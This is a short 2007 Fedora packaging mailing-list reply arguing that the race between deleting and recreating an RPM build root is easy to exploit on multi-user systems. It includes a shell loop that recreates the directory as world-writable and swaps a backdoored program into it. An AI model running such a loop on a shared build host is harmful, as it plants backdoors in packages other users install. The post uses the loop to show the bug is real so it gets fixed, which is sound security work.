[Fedora-packaging] Re: buildroot race condition
enrico.scholz at informatik.tu-chemnitz.de
Tue Mar 13 08:05:05 UTC 2007
"Tom 'spot' Callaway" <tcallawa at redhat.com> writes:
>> Someone could pre-make the build root in between the rm and mkdir
> Erm, ok. In the buildsystem, this should never happen (hooray mock), but
> when building on a multi-user system, I can see the remote possibility.
> However, we're talking about someone performing an operation in a very
> tiny gap.
No; should be trivial to exploit with:
$ create-big-load &
$ while test ! -e "$d"/bin/prog; do rm -rf "$d"; mkdir -m0777 -p "$d"/bin; done; \
rm -f "$d/bin/prog"; cp -a my-backdoored-prog "$d/bin/prog"
[ the while-loop should be implemented in C ]
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Size: 480 bytes
Desc: not available
More information about the Fedora-packaging